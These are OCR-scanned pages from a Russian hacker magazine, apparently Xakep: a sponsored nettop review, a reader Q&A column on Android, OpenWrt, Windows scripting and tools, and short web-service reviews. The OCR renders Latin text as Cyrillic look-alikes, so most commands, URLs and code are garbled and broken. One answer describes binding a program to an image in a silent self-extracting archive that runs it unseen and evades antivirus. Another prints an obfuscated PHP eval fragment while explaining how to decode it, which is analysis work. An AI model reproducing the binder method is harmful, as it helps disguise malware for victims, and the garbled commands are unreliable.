РІазб Вепебтагк ’08: 9680 баллов 

РізЫЕТапк(1280 х Ю24, 

1000 объектов): 13 РР8 

Температурный режим: 

ІіпХ, СРО: 55 градусов 

РигМагк 1.9.2.: 83 градуса 

Аіба НОО: 41 градус 



969 баллов 
2,7 радез/з 
969 баллов 
2,55 ор/з 
969 баллов 

1,64 Мб/с 
969 баллов 
22,72 РР8 



С овсем недавно при организации рабочего 
места возник резонный вопрос, какой ста- 
вить компьютер. Отдельный системный 
блок — громоздко, моноблок — слишком 
дорого, а вот неттоп оказался в самый раз. 
Там, где не нужна избыточная вычислительная мощь, 
но требуется работа стандартных офисных программ 
или трансляция системы видеонаблюдения, эти ком- 
пактные компьютеры приходятся как нельзя кстати. 

Неттоп А81)3 ЕееВох РС ЕВ 1033 выглядит действи- 
тельно элегантно: толщиной менее трех сантиметров, 
он скорее напоминает буклет, нежели персональ- 
ный компьютер. А благодаря креплению ѴЕ8А, кото- 
рое к тому же позволяет вращать неттоп вокруг оси 
для доступа к разъемам монитора, его можно раз- 
местить так удобно, что он особо не будет выделяться 
на фоне современных тонких ЖК-панелей. 

Что касается производительности, то традицион- 
но неттопы строят на энергоэффективных и эконо- 
мичных процессорах Іпіеі Аіот и аналогах. В нашем 
экземпляре установлен двухъядерный процессор 
Іпіеі Аіот 02550 с частотой 1,86 ГГц. Оперативной па- 
мяти смонтировано 2 Гб, но можно «воткнуть» до 4 Гб 
ОЗУ. Частота памяти составляет 1600 МГц. Приятно, 
что в столь компактном корпусе разместился дис- 
кретный видеоадаптер на ядре МѴЮІА СеРогсе 61 ОМ. 
Пусть это не самый мощный чип, но благодаря двум 
интерфейсам он позволит выводить НО-видео сразу 
на два монитора. Наш неттоп оснащен жестким дис- 
ком на 320 Гб, но есть экземпляры с диском на 50 Гб. 
Кроме того, если важна скорость, но не объем, суще- 
ствуют модели с 880-накопителями емкостью 16 или 
32 Гб. Что касается внешних интерфейсов, то допол- 
нительные устройства можно подключить к четырем 
портам 1)8В 2.0 или двум портам 118В 3.0. Выйти 
в Сеть можно подключившись проводом или же по ѴѴі- 
Рі, благо присутствует встроенный адаптер беспро- 
водной сети с поддержкой ІЕЕЕ 802.11 Ь/д/п. 



ВЫВОД 

Когда среди задач фигурируют слова «интернет», 
«кино», «документы» и более ничего, то смысла тра- 
титься на дорогой и производительный компьютер, 
в общем-то, нет. И здесь вполне обоснованно на пер- 
вый план выходят энергоэффективные неттопы: не- 
большая производительность, компактные размеры 
и крайне низкое энергопотребление. Кроме того, та- 
кой компьютер запросто крепится на заднюю панель 
монитора и практически незаметен. А что касается 
конкретно модели А81)8 ЕееВох РС ЕВ 1033, то он вы- 
глядит отменно, вполне функционален и даже недо- 
рог. Спектр решаемых задач, с учетом дискретного 



видеоадаптера, достаточно широк, а возможность 
подключения двух мониторов может пригодиться. Ну 
а приятные фишечки, вроде виджета на рабочем сто- 
ле, где отображается реальное энергопотребление 
и сэкономленная за период энергия, отвлекут от по- 
стоянных забот, з: 







На правах рекламы 
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ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО@ПРАЕ.ХАКЕР.Ри 




Роман Гоций 

до{5ііготап@дтаіІ.сот 



При попытке кинуть на Апсігоісі -телефон 
файл Ио8І5 при помощи АОВ получил со- 
общение об ошибке. Телефон рутованный. 
В чем может быть проблема? 

□ Несмотря на то что ты рутовал свое устрой- 
ство, файловая система все же осталась 
геасі-опіу. Можно перемонтировать ее командой 
асІЬ гетоипТ чтобы она стала геасі-ѵѵгііе. 
Но для этого нужно, чтобы демон асІЬсІ на устрой- 
стве был запущен под рутом («асІЬ гооі»), с чем 
могут возникнуть проблемы. Воспользуемся бо- 
лее универсальным методом: сделаем гетоипі 
файловой системы через зііеіі («абЬ зііеіі») или же 
непосредственно с устройства, используя 
ТегтіпаІ ЕтиІаЮг (или ему подобных программ). 

# тоип-Ь -о гетоипі: -1: уа-р-Рз2 «-і 
/сІеѵ/Ыоск/гп'ІісІЫоскЗ /зузііет 

Система уже геаб-ѵѵгііе, но все еще можешь 
получить ошибку об отсутствии доступа — его 
нужно дать: 

# сЬтосІ 777 /зузііет/еіс 

Чтобы вернуть файловой системе геаб-опіу- 
статус, набираем: 

# тоипі: -о го^гетоип•^: -1; уа-р-Рз2 
/беѵ/Ыоск/т1:бЫоскЗ /зузііет 

□ Существуют ли какие-нибудь приемле- 
мые способы редактировать реестр 
винды из-под линукса? 

□ До недавних пор «нормальных» способов 
сделать это из-под Ыпих не было, так 







Интерфейс РРТСсІгоісІ 



что проще было заюзать ЕіѵеСО на базеѴѴіпбоѵѵз. 
Но совсем недавно появился проект НІѴЕХР8, ко- 
торый опирается на такие разработки, как Р1)8Е 
и НІѴЕХ. Он позволяет примонтировать реестр 
ѴѴіпбоѵѵз к любому каталогу, то есть дальще мож- 
но обращаться с ним, как с обычной древовид- 
ной файловой системой: каталоги этой ФС явля- 
ются разделами реестра, файлы — ключами, 
а содержимое файлов — значениями этих клю- 
чей. Типы параметров устанавливаются расши- 




ренными атрибутами файла. Монтирование ре- 
естра выполняется с помощью команды Іііѵех^з: 

# Ьіѵех-Рз /тпТ/міп /тпТ/гее 

где первым параметром следует указать точку 
монтирования диска, на котором размещен ре- 
естр ѴѴіпбоѵѵз, а вторым — каталог, куда будет при- 
монтирован реестр. Сейчас утилита используется 
в Ог.ѴѴеЬ ЫѵеСО ( ТгеебгѵѵеЬ.сот/Ііѵесб ). 




СОБИРАЕМ СВОЮ ПРОШИВКУ ОРЕМѴѴПТ 



Часто бывает так, что процесс настройки 
ОрепѴѴгІ приходится повторять заново, 
например после переустановки прошив- 
ки по каким-либо причинам или, скажем, 
при покупке нового роутера. Но нет необхо- 
димости каждый раз заново править конфиги 
и устанавливать нужные пакеты: ты можешь 
один раз создать настроенную под себя 
прошивку (в которую включишь все необ- 
ходимые пакеты и программы, настроишь 
конфиги и так далее) и потом использовать 
ее сколько угодно раз, что очень удобно. 
Давай рассмотрим, как это сделать. 




Для начала получим исходники Ореп\Л/г1: 

# 5ѴП со 5ѵп://5ѵп.ореп\л/г1;.огб/»-' 
ореп\А/г1:/1:гипк/ орепѵу/г-1: 



После этого переходим в папку с сырцами, уста- 
навливаем, проверяем зависимости: 



# сб орепѵ/гі; 

# ./5Сгір1:5/-Рееб5 ирбаііе -а 

# ./зсгір1:5/-Рееб5 іпзіаіі -а 

# таке ргегед 



Дальше займемся конфигурацией 
сборки. 

# таке теписопіі§ 

Начнем с конфигурации сборки под кон- 
кретное железо. Для этого заходим в пункт 
меню «ТагдеІ-РгоТіІе» и выбираем из списка наш 
роутер, например ТР-ЕІМК ТЕ-МР3420. Если же 
твоего девайса нет в «ТагдеІ-РгоЛІе», то нужно 
указать версию чипсета, на котором он постро- 
ен, в пункте «Тагдеі 8у5Іет». 



г 



и устанавливаем все, чего не хватает. 
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Вопросы и ответы 






□ Запустил ВаскТгаск 5 на планшете по- 
верх Апсігоісі. Но никак не могу найти там 
Аігсгаск-пд. Можно ли его как-то установить? 

□ Для этого тебе нужно скачать исходники 
и скомпилировать их на своем устройстве. 
Для этого запусти ВаскТгаск (достаточно консо- 
ли) и выполни; 



# арХ-^еІ іп5І:а11 2ІіЫб-сіеѵ 

# м§е1; Іі1;1:р://Ьі1:.1у/1іЬ55І-сІеѵ 

# сіркё --іпБТаІІ 1іЬ55І-сІеѵ_0.9.4-^ 
8к-7иЬип1:и8 . б_агте1 . сІеЬ 

# арТ-ееТ іпзТаІІ 5оигсе-аігсгаск-п§ 

# ссі /ѵаг/ЬаскТгаск/зоигсез/аігсгаск-пб*-* 
/1. 1/Ы:9/ир5І:геат-5оигсе5/ 

# Таг -Х 2 -Р аігсгаск-п§.Таг .§2 

# ССІ аігсгаск-п§/ 

# таке 

# таке іпзТаІІ 

Теперь можно запускать Аігсгаск-пд, но рабо- 
тать он будет только с внешним ѴѴі-Рі-адаптером, 
так как тот, которым комплектуется большинство 
АпсІгоісІ-девайсов, не поддерживает режим мо- 
ниторинга (ремарка: это не совсем так, группа 
специалистов выяснила, что режим монито- 
ринга обрезается на уровне драйвера. Энтузи- 
асты модифицировали стандартную прошивку 
под некоторые девайсы, после установки ко- 
торой режим мониторинга становится доступ- 
ным. Но на данный момент решение не очень 
стабильно, поэтому не буду тебе его предла- 
гать; если интересно, вот ссылка: Ііирз://сосіе. 
доодІе.сот/р/Ьстоп ). А о том, как подключить 
внешний ѴѴі-Рі- адаптер, подробнее можно про- 
читать здесь: ЬіМѵ/ехІ ѵѵіТі . 

Работаю администратором сети Ѵ\Гіпбоѵѵ8 
в крупной компании. Сейчас планирует- 
і ся масштабное расширение оборудования, 

соответственно, это все добро нужно будет 
^ как-то мониторить. При этом хочется опера- 

тивно получать подробное инфо о поломках. 
Что порекомендуешь? 

Большинство продуктов для мониторинга 
поддерживают отправку 8М5/е-таіІ в слу- 
чае аварии, но я порекоммендую тебе задейство- 
вать смартфон для этих целей. Среди существую- 
щих на рынке вариантов хочется выделить РРТС 
от Раеззіег ( раеззІег.сот/рг1:а ). Продукт имеет 
отличные Апсігоіб- и іРІюпе-клиенты с богатым на- 
бором функций. Помимо самого факта аварийной 
ситуации, со своего смартфона ты сможещь уз- 
нать детали произошедшего, посмотреть различ- 
ные графики и логи. Еще один хорощий про- 
дукт — ОрМападег ( ЫІ.Іу/ОрМапаоег ). Для него 






КАК УПОРЯДОЧИТЬ 
НАГРАБЛЕННОЕ 



□ По работе приходится захватывать сетевой трафик с разных машин, под 
управлением различных операционок. Довольно часто забираю сар-файл 
с собой для дальнейшего анализа. Со временем этих сар-файлов насоби- 
ралось очень много на разных носителях, и найти нужный среди этой кучи бывает 
сложновато. Как бы все это упорядочить? 

□ Удобнейший инструмент, который поможет решить твою задачу, — облачный сер- 
вис СІоисіЗІіагк ( у/ѵѵ\л/.сІоидзІіагк.ога ). Это облачное хранилище, разработанное 
специально для файлов дампа трафика. Сервис позволяет просматривать дам- 
пы в удобном формате, имеет полезные инструменты для систематизации загруженных 
дампов: им можно присваивать теги, оставлять свои комментарии в любом месте дампа, 
а также расшаривать. Это инструмент из разряда тизі Ьаѵе для любого, кто связан с за- 
хватом трафика. 



Следующим шагом надо выбрать нуж- 
ные модули ядра, то есть те, которые 
будут включены в прошивку. Важно 
заметить, что при выборе модуля существует два 
варианта: компиляция модуля в отдельный па- 
кет — такие модули помечены буквой [М] — или 
же компиляция непосредственно в ядро — такие 
I модули помечены звездочкой [*]. Далее прой- 

дись по пунктам и отметь нужные тебе модули. 
Для добавления в прошивку разного рода про- 
грамм воспользуйся пунктами меню: Меіѵѵогк, 
МиШглесІіа, Шіііез, еіс. Когда закончишь, не за- 
будь сохранить изменения. 



И Теперь займемся конфигами. Идем 
в папку 1агде!/Нпих/аг71хх/Ьазе-Я1е8/, 
где вместо аг71хх указываешь назва- 
ние используемого чипсета. Это директория, 
файлы из которой будут помещены в прошивку. 

В ОрепѴѴгІ конфиги по умолчанию надо положить 
в папку еІс/бе^сопЯд. Создаем для них папку: 

# тксііг е1:с/сІе-РсопЯ§/1:1-тг3420 

и помещаем в нее нужные конфиги ОрепѴѴгІ. 

Для конфигурации установленных в прошивку 
приложений правим их конфиги в директории 
Теедз/раскадез/тиІ^ітесІіа/. 



Ну и наконец, после всех конфигураций 
выполняем заветную команду: 

# таке 

Ждать придется не очень долго. Если сборка 
прервалась с ошибкой, добавь к «таке» пара- 
метр «Ѵ=99». Так ты включишь режим вывода 
дополнительной информации, что поможет 
разобраться с проблемой. Если сборка прошла 
успешно, результат будет лежать в Ьіп/назва- 
ние_твоего_чипсета/. Все. Твоя собственная 
сборка готова. 
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нет специальных приложений под мобильные 
платформы, но есть ничем не уступающий веб- 
интерфейс ОрМападег Зтаіірііопе СІЛ. Кроме 
подробной информации о неполадке, он предо- 
ставляет пользователю инструменты ріпд и Ігасег- 
ои^е, с помощью которых можно уточнить, что 
за проблема возникла. Следует отметить, что оба 
продукта распространяются на коммерческой ос- 
нове, но, думаю, это не станет непреодолимым 
препятствием для крупной компании. 

□ Занимаюсь разработкой игрового движ- 
ка на С++. Сейчас нахожусь в поисках оп- 
тимального скриптового языка для проекта. 
Все советуют РуІЬоп (Ьоозі.руІИоп) или ^иа, 
но мне нужно что-то более легковесное. Мо- 
жешь что-то подсказать? 

□ Посмотри в сторону зриіггеі ( сосіе.доодіе. 

сот/о/зоиіггеІЛ . Этот легковесный скрип- 
товый язык создан специально для использова- 
ния в геаі Ііте программах, в том числе играх. 
Синтаксис его чем-то похож на Ша, но более 
С++-подобный. Для критических по времени за- 
дач имеется ЛТ-компилятор. Использовался 
в таких проектах, как ^ей 4 ОеасІ 2 и РоііаІ 2. 

□ Реально ли заскриптить батник (или 
РоѵѵегЗЬеІІ -скрипт), который бы подсчи- 
тывал количество 118В-портов на машине, 
при этом определяя, какой это порт: иЗВ 2.0 
или иЗВ 3.0? 

□ Конечно, даже не прибегая к всемогущему 
РоѵѵегЗ^іеІГу. Обычный батник легко спра- 
вится с задачей. 

@есЬо о-р-р 
5ѳ1:1оса1 

Бе! Ь=мтіс ра-рЬ ІлІіп32_РпРЕп1:і1:у §е1; 
ІіагсІіл/агеісІ /ѵаіие | РіпсІ5І:г 
"КООТ_ниВ[2-3]0" 

■Рог /-Р "1:океп5=3 с1е1іт5=,}" ^ 

(' "%Ь%" ■) сіо ( 

і-Р "%%-і"=="и5В\коот_нив20" 

Бе-р /а и2+=1 

і-Р "%%~і"=="и5в\коот_нивз0" 

Беі: /а иЗ+=1 

) 

есЬо У5В-2.0: %иБЬ_2% 
есЬо У5В-3.0: %иБЬ_3% 

Утилита ѵѵтіс (ѴѴМІ Соттапсі-Ііпе, ЬіІ.Іѵ/ѵѵтіс 



ОДНОЗНАЧНОГО ОТВЕТА НЕТ 

□ Часто ставлю планшет или телефон на ночь на зарядку — 

но для полного заряда ему достаточно двух-трех часов. Очень 
волнует вопрос, не навредит ли «перезарядка» аккумулятору? 



^ІНодз ѵегБіоп 

і 


0.8.Ѳ 
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РРОСРАМ 
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5ЕМТ 


РЕСЕІѴЕО 


772 готап 
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0.000 


0.000 КВ/зес 
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0.529 


14.407 КВ/зес 





ЫеІНодв в действии 

іпір) позволяет выполнять запросы ѴѴОІ к клас- 
сам и объектам ѴѴМІ как локальной, так и удален- 
ной машины. 

□ Нужно склеить картинку и программу, 
но код большинства джойнеров опре- 
деляется антивирями. Есть какой-то беспа- 
левный метод? 

□ Если программа, которую будешь клеить 
к картинке, сама по себе не палится анти- 
вирем, то самый тривиальный способ склейки 
файлов — ЗРХ-архив, созданный, например, 
при помощи ѴѴіпРаг. Для этого создаем архив, 
в который запихиваем нужную программу, кар- 
тинку/аудио/документ и Ьаі-файл, например та- 
кого содержания: 

(ЭесИо о-Р-Р 
Біагі ітаее.зрб 
Біагі рго^гат.ехе 

Теперь конвертируем этот архив в ЗРХ, 
при этом можно указать в дополнительных па- 
раметрах ЗРХ на вкладке «Общие» абсолютный 
путь распаковки (например, %Тетр%). На вклад- 
ке «Инсталляция» нужно прописать название 
нашего Ьаі-файла, а на вкладке «Режимы» вы- 
ставить «Полное молчание». Чтобы избавиться 
от консольного окошка, которое появляется из- 
за батника, просто конвертни его в ехе при помо- 
щи утилиты типа Ьа12ехе. 

□ Наткнулся на такой кусок РНР-кода: 

еѵаІ(ргед_герІасе("/іг/е", "АК=е9СЬТ8г^ 
9ГРдбЬ2ра .. ."''"\х24=\х5с\х09\х11 \х20Ѵ 
х12=Ѵ\х14и\х0Ах24\х02Е\х0а...”,"іг")); 

Не пойму, как и чем выполнялась обфускация? 




О 



□ о всех современных 

устройствах используются 
литий-ионные батареи. Встроенные 
в них схемы (контроллеры заряда) 
автоматически отключают батарею 
от зарядки, когда достигается 
максимальный уровень заряда. 
Соответственно, литий-ионную 
батарею невозможно «перезаря- 
дить», так что не стоит беспокоиться 
о вреде избыточного питания :). 




□ другой стороны, работа схем 
управления зарядом 
сопровождается выделением 
тепла. Количество этого тепла 
зависит от конкретного устройства 
и еще от массы других параметров. 
Так вот, литий-ионные батареи не 
очень это любят. При нагреве они 
быстрее разряжаются, и срок их 
службы сокращается. 



□ Да, не очень очевидный способ. Во- 
первых, модификатор /е заставляет 
ргед_гер1асе выполнять второй параметр функ- 
ции как РНР-код для каждой найденной подста- 
новки, которая у нас здесь одна {Хг). Что же 
у нас идет вторым параметром? Вторым пара- 
метром идет побитовый ХОВ (символ '') двух 
строк. Если заХОВить те части, что ты прислал, 
получим: 

еѵа1(§2ІпЯаі:е(Ь 

Здесь видим знакомый классический метод 
обфускации, и очевидно, что Ь — это первая 
буква названия функции Ьазе64_с1есос1е. Чтобы 
деобфусцировать этот код, просто замени еѵаі 
на есИо. 

□ Подскажи, пожалуйста, как легче всего 
получить список компьютеров в подсе- 
ти, на которых запущен некий процесс, напри- 
мер СИготе? 

□ Самый легкий способ достать нужную тебе 
инфу заключается в использовании ко- 
мандлетов АсЯѵе Оігесіогу Зегѵісе Іпіегіасез 
в связке с РоѵѵегЗИеІГом. Установка и работа 
с А05І уже освещалась на страницах нашего жур- 
нала ( хакео.ги/роз1/50777 ). так что с этим 
не должно возникнуть проблем. Перейдем сразу 
к делу. Твоя задача решается с помощью следую- 
щего скрипта: 

$сотрБ = Сеі-АОСотриТег -РіІТег * 1 ^ 
БеІесТ -ехр пате 
■РогеасЬ ($с іп $сотрз) { 

СеТ-ІлІМІОЬзесІ; ІлІіп32_РгосеББ 
-Сотри1;егNате $с -РПТег "пате=*-' 

'сіі готе. ехе'" | -РТ СБпате } 

Согласись, довольно лаконичное решение. 

□ Как под ипих посмотреть количество пе- 
редаваемых байт в секунду для каждого 
конкретного приложения? То есть, например, 
в таком виде: зкуре — 100 Кб/с, СИготе — 
20 Кб/с и так далее. Может, есть какой-то пла- 
гин для системного монитора? 

□ В этом случае удобнее всего воспользо- 
ваться консольными утилитами, такими 
как піор или МеШодз. Последняя попроще 
и больше подходит под твое описание. Если ее 
не окажется в стандартных репозиториях, 
то она легко и быстро собирается из исходников 
(доступны по адресу пеШооз.зоигсеРогде. пеІ). 
Чтобы посмотреть интересующую тебя информа- 
цию, выполни в терминале: 

# пеіЬобз 

Дополнительно можно указать первым па- 
раметром название сетевого интерфейса, 
по которому МеШодз и будет выводить инфор- 
мацию. ІК 
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Расширение, значи- 
тельно упрощающее 
работу с почтой 
для людей с ненор- 
мальным графиком 




ВООМЕНАНС ( ЬоотегапаатаіІ.сот ) 

Так уж получается, что я часто работаю по ночам. 

А многие люди, которым я пишу в это время, — нет. И когда 
на следующий день они приходят на работу, они могут по- 
просту не увидеть мое послание, оказавшееся на самом дне 
кучи писем от людей, работающих по утрам. Воотегапд — 
это расширение для СИготе/РігеТох, которое позволяет 
отправить письмо по расписанию, что решает эту проблему. 
Более того, с его помощью можно настроить слежение за от- 
ветом — и тогда система подскажет тебе, что твое письмо 
не увидели и стоит написать снова. Наконец, Воотегапд 
может отложить прочтение входящего письма; письмо уйдет 
из инбокса и вернется через заданный промежуток времени 
с пометкой «не прочтено». 



виррЕВ ( 



— ^ Есть небольшой парадокс, связанный с социальными сетя- 
ми. Многие понимают, что социальные сети важны для под- 
держания профессиональных связей. И чтобы тебя читали, 
нужно вести свой Тѵѵійег или РасеЬоок более-менее постоянно. 
Но чтобы от профессиональных связей был какой-то прок, нуж- 
но еще довольно много работать. И когда при этом заниматься 
социалками? Ви^ег позволяет составить очередь сообщений, 
которая будет публиковаться в течение дня с учетом активно- 
сти твоих фолловеров. Например, можно набросать несколько 
твитов по итогам прочтения утренней подборки Р55. К слову, 
неплохой инструмент для совсем молодых стартаперов, у кото- 
рых нет денег и времени на 5ММ. 



Автоматизированный 
^ сервис, позволяющий 

создать видимость со- 
120 циальной активности 

Убить всех человекоіі 




Ро$і Мом $ АМ (О ВиЛег 



Пожалуй, самый про- 
стой способ «пролезть» 
через географические 
ограничения амери- 
канских медиасер- 
висов 
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МЕ^IАН^NТ( I^пр8://тес^іаIтіп^сот ) 

— ^ Пользоваться человеческими медиасервисами (Ниіи, 

Ме^іх, Рапбога...) в России непросто. В одном из прошлых 
номеров ][ мы советовали для этого программку ТиппеІВеаг, 
по сути представляющую собой платный туннель. Мебіа Ніпі же 
совершенно бесплатное расширение для СИготе/РігеТох, сни- 
мающее географические ограничения при работе со многими 
сервисами. Благодаря ей я уже давно пересел на гениальную 
Рапбога, что и тебе советую. Никаких ограничений трафика или 
скорости (потому что это не туннель), и почти никаких лагов. 
Только для приличия отключи хотя бы АбЫоск. Одно дело — 
обходить соглашения разработчиков с владельцами авторских 
прав, другое — еще и лишить их дохода от рекламы... 



А8МА11НООМ ( ѵѵ\л/\л/.азтаІІгоот.сот ) 

Хороших идей гораздо больше, чем крупных компаний. 
Человек может сделать неплохую карьеру, скажем, в Яндексе. 
Но со временем перестает получать удовольствие от работы, 
выполняя второстепенные задачи или отказываясь от соб- 
ственных идей, потому что компании они не нужны. Новый 
сервис АзтаІІгоот предлагает оглядеться и сделать глоток 
свежего воздуха. Мысль простая. Вокруг полно маленьких 
команд, которые реализуют по-настоящему крутые идеи, 
но при этом крайне нуждаются в опытных спецах. АзтаІІгоот 
как раз предлагает найти интересную команду и пообщаться 
с ней анонимно, не раскрывая себя. А если понравится их про- 
ект — обменяться с представителем команды контактами. 



АЗМАШРООМ 
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Успех любой компании создают 
несколько десятков человек 
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Как пользоваться этим сервисом: 

Для начала — мрап«ѵтрируетась. 




Среди известных чита- 
телям Хакера команд 
здесь уже появились 
НідЫоасі^аЬ, ЕѵіІ 
Магбапв, ЗрЫпхЗеагсб 






